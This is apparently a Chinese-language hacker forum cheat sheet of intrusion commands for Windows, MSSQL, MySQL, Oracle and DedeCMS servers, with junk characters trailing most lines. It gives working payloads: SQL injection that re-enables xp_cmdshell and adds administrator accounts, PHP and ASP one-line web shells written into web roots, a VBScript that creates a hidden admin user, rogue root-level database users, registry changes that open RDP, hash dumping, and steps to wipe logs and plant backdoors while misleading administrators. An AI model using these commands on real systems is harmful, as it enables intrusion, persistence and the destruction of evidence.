2 [+ y' P t5 S" j; U% }+ |" X0 U0 i
1.net user administrator /passwordreq:no
5 X- Q& V* X, J h% w) P这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
* ` \0 V& Q' n' A( [ h2.比较巧妙的建克隆号的步骤3 n& ]* h! k& y( u) T _
先建一个user的用户
+ j) B9 A% ^& C: B [) |然后导出注册表。然后在计算机管理里删掉3 s/ a# M% X; c6 `, W
在导入,在添加为管理员组+ a/ k/ u3 b' e* W9 n+ s; Y
3.查radmin密码
+ S. z$ l3 [2 O. v( Zreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg! _5 s6 C; u# h/ t8 v7 M
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
# I+ s" Q% a4 f T3 u建立一个"services.exe"的项
) o) A" i, ~) Q. ]7 |5 S再在其下面建立(字符串值)
- @2 [$ Q+ n! ?! S0 y1 @键值为mu ma的全路径
( c! @, E. z u, t. L4 s* d5.runas /user:guest cmd
9 y, R( T. ?* Y# F! Q3 C- H5 e测试用户权限!; {: }! G1 d% u8 R$ N& ^+ F
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?, ?* D3 v8 A' Y P: d( A+ n
7.入侵后漏洞修补、痕迹清理,后门置放:: z6 P* y5 w1 }3 p
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门 y! W. o7 C _0 o# D
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
4 `: Z) N" Y& Y* ^4 T" n' X ^( r0 T! ^4 ~% n& ]4 B# a
for example
+ r. D( G! C% m3 T# i
: J4 D" P1 d K$ }& P8 ]; N) ^ Wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
/ z" M$ i! B) r- z! o' ?" @* Y6 i" b9 r6 k# u5 i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
* E$ W0 S7 s# s$ C- E8 X. N% N9 T/ o! i# b' Y8 Q) _4 G. E
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了" M1 X7 P0 ], L
如果要启用的话就必须把他加到高级用户模式' C/ l; L, S' Q" G- T
可以直接在注入点那里直接注入
: \: b# u9 u& w4 j4 u: @5 kid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
" n3 K: G" N2 a, W. p然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
7 y. Q& ^( ~/ o' d* T& J8 f/ \或者
l( C b3 e, M0 Z* e- _sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
$ P$ |7 J- A. i# q# n7 a! R+ o来恢复cmdshell。8 R3 o6 F0 P. b# N
5 A& R8 X0 }) T d+ Z. g, m, b分析器
: T9 ^6 J b5 R8 Y2 K" x* OEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
3 H3 [" ~5 V6 g然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll"): F2 D* ~# [( s/ K& ^; Z% p
10.xp_cmdshell新的恢复办法4 V% C3 h; w' O8 v- C
xp_cmdshell新的恢复办法 P, k! |, z2 n6 f8 q9 R, ^
扩展储存过程被删除以后可以有很简单的办法恢复:
3 E* ^* U% X8 D! @删除, T6 r6 x4 [5 y: H2 ^$ O) J
drop procedure sp_addextendedproc
2 j n- D3 ]6 p8 Udrop procedure sp_oacreate
3 t x5 ^/ K4 E+ p4 Zexec sp_dropextendedproc 'xp_cmdshell'
7 I7 ?1 d- O' c4 v
6 t4 [6 [, B; N* y恢复
5 M. }6 ]9 C4 B1 S6 U+ d9 jdbcc addextendedproc ("sp_oacreate","odsole70.dll")
" ]& A3 B# e0 A8 }- z. D7 Cdbcc addextendedproc ("xp_cmdshell","xplog70.dll")1 h/ y6 x s+ C6 c
2 X; o7 j9 u( @- h0 s: U
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
- u9 g( S7 [8 J+ k5 F( T5 X, ^& [2 O# ^( ~) t8 i
-----------------------------
( M4 ]0 K+ l3 v8 J# O
. k& G3 Y/ u! T8 E I; F( k删除扩展存储过过程xp_cmdshell的语句:' }' B; p6 W1 O- u
exec sp_dropextendedproc 'xp_cmdshell'% a( T3 [' j& L5 T* D. ?
+ d7 @) z% M0 G3 y! K
恢复cmdshell的sql语句
. ?# V5 p2 E( s# ?1 r8 zexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'* m" w: S/ U( S3 D7 t7 f
+ w8 S: L3 i/ s/ `) S+ Y! u, w% F9 c- B/ ]0 Q1 {3 B
开启cmdshell的sql语句
; ^) t9 E+ [1 D+ V; ~/ i% I4 w0 Q1 d' D' v# K
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'" z$ D y: L+ V c& X, j3 }; C
1 b/ l6 t% f9 a; N判断存储扩展是否存在
% s# E% B: n, s2 q, [, cselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
: s! j- x- b% Q返回结果为1就ok
% {4 P) @8 p$ j p* {, E' ?
/ [/ s% z$ B& M) L0 M1 H) o恢复xp_cmdshell; `& h5 Z9 _: T# E) S
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
. @* ^9 I; {* d0 T8 H返回结果为1就ok9 H" N' J" i! e
3 K0 o' z: `/ p( ?9 [6 B( }8 Y) P
否则上传xplog7.0.dll) U3 I( x7 u/ w9 U- r% d
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
4 y$ X, o1 z4 ^2 F/ x* f9 j6 D( J8 c
堵上cmdshell的sql语句5 x9 x) a6 \0 S2 N
sp_dropextendedproc "xp_cmdshel
% t+ ~! r* i" C6 f" A; {, k-------------------------
6 Z9 }( u7 x' q' p! w9 W# e清除3389的登录记录用一条系统自带的命令:
8 d7 C. J2 b! ~3 ~reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
k4 J- e5 }7 I4 l% ?2 o1 ~) _) e0 f- J/ N
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
5 V8 i$ b0 n) c9 [# \3 Z在 mysql里查看当前用户的权限
- ~6 P* Z$ n+ f) g% Vshow grants for
/ S) i5 ^0 H6 w" V7 J- P7 {: ~& X% w! P# |' f, Z
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。' W6 Q) g7 @% a- r8 A, k
+ h# Y+ f5 a% Z
* K* i; M/ f! GCreate USER 'itpro'@'%' IDENTIFIED BY '123';5 H6 K4 j; A' h, U
+ x3 u4 r5 J* C1 Z) B
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION/ A8 y* E6 H3 `& [& Q; H# w
7 V/ i# H. V( t& V( y
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0" S ~( c. Y4 ~! _1 D
% ]8 s/ h1 z. ]7 i7 X% B" T+ F0 ~MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
9 _" \* A' K/ w- d7 y
8 ~; Z, g6 u! Z, @& Q& Z搞完事记得删除脚印哟。( R6 c. u# Z% m% U& m9 w1 D
# R6 \/ B* @& f2 u' f3 M& w
Drop USER 'itpro'@'%';' U/ L3 y% m1 k7 x9 J* `- I$ W: V
* H7 r* h7 P; Y( MDrop DATABASE IF EXISTS `itpro` ;. d! E4 ^) h4 i6 h4 { Y2 Y- h; f& {6 E
3 i8 W5 }/ y- {& Y! \, V4 q
当前用户获取system权限: n- F, u. ?" V2 c; g' V; ^
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact+ J0 M3 j ?/ W& `, u1 c
sc start SuperCMD
; k6 ]+ r R: n- }+ M, F程序代码; i- \/ N' c2 \, Q8 t
<SCRIPT LANGUAGE="VBScript">: i" D3 j/ [4 D0 C# O
set wsnetwork=CreateObject("WSCRIPT.NETWORK")9 V- I$ d9 G: ~, R
os="WinNT://"&wsnetwork.ComputerName
# n$ y" ?" A% JSet ob=GetObject(os)
) {5 i* G9 ~' s8 F$ M- w9 bSet oe=GetObject(os&"/Administrators,group")% ^/ U c$ i" H5 M5 X; }3 J& {# }& O
Set od=ob.Create("user","nosec")
) U; y0 h4 V5 Aod.SetPassword "123456abc!@#"/ `: p @7 ?$ B( D; W8 O6 m9 ?2 x
od.SetInfo) ^1 R4 I! A: F1 G! q2 m
Set of=GetObject(os&"/nosec",user)
. C _+ g& D) Q/ t0 _oe.add os&"/nosec"4 K2 Y5 E$ i3 L6 [. R9 @* f
</Script>% h9 k4 m y# r) w! \' u
<script language=javascript>window.close();</script>* B) Y l7 G5 y9 [2 W) l0 @
7 z% S3 |, U5 t9 g5 F
7 K; @" l. A) C; g- g) {
& ~% O F- F; |3 ~
: H1 _ X0 h! M+ h% x% j突破验证码限制入后台拿shell1 M$ ]3 S$ N5 l: c* @ p/ ]% Z
程序代码5 d( Z7 N. c- N% ^0 e
REGEDIT4 D6 I0 n( d+ d& d
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
3 ^( [* y. q+ O/ j/ S5 ?$ T"BlockXBM"=dword:00000000
! ]& s6 ]6 C: @* z5 L. A" j; Y; F. ~+ \( o- e
保存为code.reg,导入注册表,重器IE4 C4 a9 ~5 `, ^' X; N: `
就可以了
$ k# o5 w+ s' n, qunion写马
+ \; T3 U8 ^% S) E, b7 a程序代码/ Z; k; x' ^( \' t
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
& @+ w- p% N( B/ p0 k1 \2 r2 T' q1 h$ y/ S# }3 ^! y. P
应用在dedecms注射漏洞上,无后台写马
/ D) v! b; b! V1 K0 Q8 gdedecms后台,无文件管理器,没有outfile权限的时候
" j2 I4 J8 e# i+ L在插件管理-病毒扫描里9 D u- R* \0 }- l
写一句话进include/config_hand.php里
0 X, @! Q* A# A, u程序代码
w$ C. G5 W' Y0 G" v1 }& r7 K>';?><?php @eval($_POST[cmd]);?>
" ]4 p( C# [/ u+ C& h3 w% m( t" t8 J$ P) f: L' K/ D+ F7 l
+ R( r) y2 Z ?
如上格式& d8 s0 t* w8 ]' t
0 Q6 B/ ?% b' n; p9 u
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解- x8 a. b6 O" r8 x9 H
程序代码) z" s% I+ C" A: Z2 G' z/ p1 d {
select username,password from dba_users;; H* n# H ?. h, ]$ n
+ g9 \- i4 Q! c8 }: X, f3 u3 Z
" y0 _( V7 ~ }7 t, ?! B. [mysql远程连接用户% z. R4 {; K) h/ | q
程序代码/ h( b6 S. ?9 _+ b, n" h* h& A4 p
' u4 g4 t. b/ B6 Y5 d# h, X5 iCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';8 P" ~- h: F# t, b% E* T- u
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION+ q3 e( H$ _' C/ C9 |: `
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0. M* O% ^) ^7 o8 d7 w; u( R+ k
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
v9 J- D8 [8 M. j9 ?
0 H4 f' O; t3 P1 v' w, s- g8 W& U/ `, f; \+ q
% O$ p+ Q( U; B& f& W0 ^) z2 V5 C6 T5 @1 S7 |* k7 q6 t! v- ]
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
: L8 `) {0 [$ d; v
/ ]2 D q1 F- c& M1.查询终端端口* E- ?# m7 b, }( R" r r. |+ A
9 B+ C( i% d8 u: |, k) h
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber3 m; |; w, n6 Y
: G5 j9 y1 W, n5 U7 D3 i: C通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
$ t; W3 O, z& J5 r+ otype tsp.reg
$ x9 {8 P3 f" i+ J
/ D: Z& K3 {& }) `3 I2.开启XP&2003终端服务
3 k; g% m; l1 T1 Z- _! ]0 i X0 M+ a" c1 \: E
9 k& J' \8 D7 E0 q: U O2 _) dREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f, R- J$ w! C, v; Q7 x8 r1 _9 E
# k- _( J4 ~) k! H9 D
$ Y/ U/ w g7 d2 I+ A) C3 a6 e+ `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f& L$ e3 w% p8 n ]1 P1 F# [
6 Q5 r- R* [2 C+ u3.更改终端端口为20008(0x4E28): G* r: E1 E' A5 [
# c _) O+ W3 I
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
3 [' E- b7 r$ ^. z, O, Y- C1 S9 v* _* q
! r ?; z! V: P1 j4 SREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
, e8 M: a5 {- A& q2 G8 B( m' i
5 p5 Q% }$ f p$ F3 n: q8 w" R4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制% k& E1 R" k2 Q3 T
" j" V$ n9 B* n9 c8 ?' VREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
4 w# J5 `9 z' V; ^/ Z( A. _! ?
; x" i2 b( ?) p( ~$ l( D# B7 p
3 Z- t" E' E9 [5.开启Win2000的终端,端口为3389(需重启)
2 N$ |$ r# ^ k- D. L7 c
& Y5 X; _! [+ [7 x5 uecho Windows Registry Editor Version 5.00 >2000.reg
8 f; Y2 y/ r) C# ~2 C) Y. H; ^3 Secho. >>2000.reg
w" \( i; u, k+ z- }+ qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
! Y( z6 \3 G5 t3 }* E0 R* becho "Enabled"="0" >>2000.reg
" q8 t$ X; t* T: z0 b6 F! I* y6 Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 6 H' a- s1 {. n
echo "ShutdownWithoutLogon"="0" >>2000.reg
- Q, C: m% @6 l' E, d3 ^echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
c" X C4 S6 W/ Q9 ?" s- m# ^echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
, ^6 G( r" M* W9 V# e+ F( Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg - \% q! t# @4 ]' i; M! v
echo "TSEnabled"=dword:00000001 >>2000.reg y7 }% u4 q5 C A1 M3 E: G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
- S. [( E5 |, N. Y6 I9 F# ~# Z5 ^echo "Start"=dword:00000002 >>2000.reg
/ M9 m. |1 e) J- C# aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg % b; R, z- y! t7 u4 X0 t& `
echo "Start"=dword:00000002 >>2000.reg
! _ _% m8 A8 \( j& D3 |echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
+ y9 f# s3 L- U2 `; X8 yecho "Hotkey"="1" >>2000.reg 1 v4 K; C; @" E2 `" |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
9 x- I2 j9 L F5 }4 i8 v, Lecho "ortNumber"=dword:00000D3D >>2000.reg ( ^9 T9 ^3 C, ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
8 v$ n5 n' a0 u- z3 \$ Kecho "ortNumber"=dword:00000D3D >>2000.reg. U6 Z3 J5 o) J( N
+ z/ {) L; p3 k. h* J
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启). V$ j I& o2 O O$ v0 y
: G/ g. |) J0 k" \2 O3 H5 x@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
$ q+ T3 _+ _4 R1 E3 ?4 b' c6 ~(set inf=InstallHinfSection DefaultInstall)2 s0 N2 M9 H( t) K7 `
echo signature=$chicago$ >> restart.inf
. P& U4 {& z' B+ @7 Zecho [defaultinstall] >> restart.inf
+ k1 k( S* ~! I: hrundll32 setupapi,%inf% 1 %temp%\restart.inf( m1 G& k9 m0 ?, M* s# Q4 P9 E
! e6 P9 n$ ?& L; Y" x
5 | L( _4 o- w! T7.禁用TCP/IP端口筛选 (需重启)
* p) t" ^7 Z: O. j: W+ r. M/ y }. A
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f5 `/ m! H& j0 o3 g$ _
8 r2 I8 [( L, M6 ~: }8 }8.终端超出最大连接数时可用下面的命令来连接
+ [5 q7 g" }0 O6 \6 Q
9 U2 ~# ~: I1 p' j8 V( @mstsc /v:ip:3389 /console+ o9 T0 a, c$ s% I" d2 M
( g% {! [1 N9 r. G. b. k: s8 `9.调整NTFS分区权限% l4 A# L9 F; y4 F3 A
. Y! R, t+ h5 A$ Q, _* Tcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)' e1 m \' u8 g
+ c4 v; g; Y9 U' Q" _
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)$ X5 K8 ~. F5 H+ e' j+ e6 e
. Z7 F8 K2 n) z% ~7 G/ d' n: @------------------------------------------------------+ B! _& d& }4 z7 N( A( z D
3389.vbs
! p9 A$ @& }# h4 eOn Error Resume Next5 N- w% n# V, x7 Q L# B
const HKEY_LOCAL_MACHINE = &H80000002- _* V3 O7 G S
strComputer = "."7 h- R6 a% e$ M2 K& K% R
Set StdOut = WScript.StdOut
1 v2 {) f3 x" I3 V. k5 l* YSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
0 t- A" j! y$ ~2 p) ]" cstrComputer & "\root\default:StdRegProv"), U- b0 r# |4 Q* [# w: T z& Q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
. c4 i* e, F' j3 joreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
; t& x. N; V8 j9 e9 ?& H: z- ostrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
3 U( Q4 f0 H. H4 f6 L, ?7 U; f1 q2 \oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
3 y0 w" R7 O( G) }: p+ RstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"! W3 W9 p1 }8 D: t1 S. A
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
# C; T3 ^+ Y" q; {# V. dstrValueName = "fDenyTSConnections"4 s4 g" [2 \; ]5 t7 V+ }) N; z+ D
dwValue = 0. U' p) Y4 E+ J: H$ S
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
1 n a2 E4 a% h8 s( K& istrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
6 `; r5 _ A: o5 |2 HstrValueName = "ortNumber"; L/ @% D0 l8 m# Y2 S' S* j& E5 C
dwValue = 33898 G4 M6 e- v/ H# C7 X' A( A9 q6 C
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
4 p; ? K* ^1 D3 S5 e& ?strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" ?2 ^; O, R4 X. z0 ]6 j
strValueName = "ortNumber"0 @+ F- a* e0 W, T" w# Z- z3 V, h7 u
dwValue = 3389
' k* F# V+ p Z2 _$ noreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. u1 x2 B' |3 a# V1 Y- ^1 e# wSet R = CreateObject("WScript.Shell") 3 z# g* T9 G: C& ~
R.run("Shutdown.exe -f -r -t 0")
1 K% X* |5 ~8 p$ c+ `- i: ^1 V$ w* _% O: ~/ N( s" N r. N
删除awgina.dll的注册表键值
/ w6 q. E+ M! w; t程序代码6 D& l* s4 `$ W: |# H
2 H8 F4 {' p3 R* u
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
, z/ ]$ G1 @4 h. z9 @5 o2 E
7 ~! m" h m+ I: D0 y _5 b1 d3 T6 I. L* f3 B
0 _* X" f. E" j3 q y6 @: Q
# ~4 I- x& d8 I% Y# |! E
程序代码, v. L- l7 A y
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
$ u# T; `# r. G7 p0 S( _" M* Q, W7 [# L# E
设置为1,关闭LM Hash1 X5 k# T' Y+ j z
: ^# H s0 D' Y: U+ r
数据库安全:入侵Oracle数据库常用操作命令, ~+ t$ K: F1 M; M0 M- a
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
8 a0 X6 ~8 W* m( m# G8 x# _1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。& R; o& X& S$ v% B" }3 w; ]
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;+ F# [8 `, J7 p& F' M1 ?3 J
3、SQL>connect / as sysdba ;(as sysoper)或2 X- ~$ j* @; a& t
connect internal/oracle AS SYSDBA ;(scott/tiger)
- J+ [0 W% v8 rconn sys/change_on_install as sysdba;! d) U) C3 ?$ y, A
4、SQL>startup; 启动数据库实例+ a: l. S- o% {# E3 Z( t
5、查看当前的所有数据库: select * from v$database;! B' k9 F5 f5 M- t% ^7 u- G. d
select name from v$database;; \4 \7 i& g# y3 E. Q/ E
6、desc v$databases; 查看数据库结构字段! H! _. N* q( D: P2 y3 ?9 p
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
6 P& `5 p ]& t6 g. Y8 G5 _2 |SQL>select * from V_$PWFILE_USERS;
! |7 N1 u' i& g, K. Y; M! TShow user;查看当前数据库连接用户6 e0 H; p7 Q3 G& ?
8、进入test数据库:database test;3 {/ h1 S {# M
9、查看所有的数据库实例:select * from v$instance;: U3 u6 d: F* S# n
如:ora9i5 C I+ v) W5 C$ @
10、查看当前库的所有数据表:; W9 N% l4 w w; x0 \9 j
SQL> select TABLE_NAME from all_tables;5 l% G- H3 ?. s/ w6 ], F
select * from all_tables; g7 H- J, o' Q5 i2 q" ]9 w* v
SQL> select table_name from all_tables where table_name like '%u%';2 \2 p9 ?, i8 F3 ~) W) [- e* ?2 x7 j' _
TABLE_NAME
* j- t5 n0 F; W4 D0 [------------------------------# R6 u! r1 @9 t; A9 o
_default_auditing_options_- ^1 U9 h- D3 Q
11、查看表结构:desc all_tables;
" n1 `; O: P0 P" j y12、显示CQI.T_BBS_XUSER的所有字段结构:
8 ~. C" f- T1 B0 Y2 N1 w4 {* kdesc CQI.T_BBS_XUSER;9 S1 j8 ^7 Q! I& g1 D6 n/ v& K( q
13、获得CQI.T_BBS_XUSER表中的记录:
+ T! j0 u0 v' m* Y6 @select * from CQI.T_BBS_XUSER;' Z# x) h( l! @; b4 N
14、增加数据库用户:(test11/test)
0 Z B8 c* Z! _- xcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
$ s, o0 {/ m; f5 N9 J6 ~. {15、用户授权:
" \ @( z& ?4 ]/ C. K! Pgrant connect,resource,dba to test11;0 k( K- u3 M2 y# `. r
grant sysdba to test11;
4 P' v1 O3 g0 }1 x/ @* Ucommit;4 n1 u; ^' w) @; e2 S1 U$ R
16、更改数据库用户的密码:(将sys与system的密码改为test.)) K$ d; ]) C1 V1 E( e3 ^7 Z
alter user sys indentified by test;
' o# u$ D; H6 r+ r6 l% g/ I7 malter user system indentified by test;) U% ~1 {5 C7 N
/ M1 }8 M# H6 `; v K+ [6 I7 WapplicationContext-util.xml1 K& t0 D, ~. K5 n% e: {
applicationContext.xml
G* H& E7 i$ p) C, f3 rstruts-config.xml
' F N; g( g9 A5 s1 p, G; Vweb.xml- j+ x: _% B2 ~5 w, ^
server.xml
7 j( r& `* L& U! U6 c5 i8 l9 k. ytomcat-users.xml2 ?5 Q- j3 a1 `0 F) h
hibernate.cfg.xml
4 z! w9 E2 ?. H& z% } H pdatabase_pool_config.xml
0 H6 m1 N' Z% b- P8 Z. [; U, ]* s
( M- f4 s+ [/ }& c5 e' \6 P {8 I) ?: f
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
; t8 p' n6 d# S+ f0 P; H\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini* [9 T4 c9 D; o
\WEB-INF\struts-config.xml 文件目录结构/ Y6 | {0 ~0 M+ C8 }
( l/ a! G3 b \5 g) ~
spring.properties 里边包含hibernate.cfg.xml的名称" s. j5 O& ]& z1 }: E! J0 b; M
" }& J8 m5 m" I) ]
& n4 j% j4 U6 b6 B, hC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml! z4 \+ H4 C3 p) S* K
( J( h- a4 E' ~. W$ N4 v
如果都找不到 那就看看class文件吧。。
" _6 M2 S$ `# R7 }; \8 o
" |, W/ e8 \8 N$ x) s测试1:+ g. n% g! a8 _
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1$ m' o$ {$ P: g" b& E
& i# O: d2 p7 L- d6 f" ] X2 t; n测试2:- [1 J2 G3 E% V- @
- b3 F6 ~7 \+ f* Zcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
$ l3 _. v1 R, x5 ]! @/ \) m( Z8 J( y, V+ {
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--' }6 \& v0 ]2 i$ I
5 d6 q, ~; i2 ?6 F: c3 fSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t11 q. b2 ~6 t8 F/ Q% h0 h: ]
7 `9 `' b1 J* D2 {5 k- f/ M查看虚拟机中的共享文件:- f+ {% }. A+ v- z, f) t& M
在虚拟机中的cmd中执行
% R" b+ w2 Y- N$ {7 ?+ h\\.host\Shared Folders
: A# n5 ~3 E, f+ u7 Z7 z
! o: S* m3 d, n X( s( a. ]cmdshell下找终端的技巧
; Z+ ?1 R4 k) U6 @3 x找终端:
) T+ C7 S) ^3 d第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
. J6 s6 |; A1 J+ B1 v* V) a+ ? 而终端所对应的服务名为:TermService
; `2 q1 O. J8 o) u) Q第二步:用netstat -ano命令,列出所有端口对应的PID值! 4 r: y j" P4 F, H" O
找到PID值所对应的端口
! K5 M: r6 o- Y
4 j9 X9 O2 [: P N$ m3 Y查询sql server 2005中的密码hash" H6 R/ ~1 X( j
SELECT password_hash FROM sys.sql_logins where name='sa'9 l$ s; {9 N! o ]. h+ i
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
$ _' @1 A* W8 Uaccess中导出shell8 K. Y* i2 `% v- _
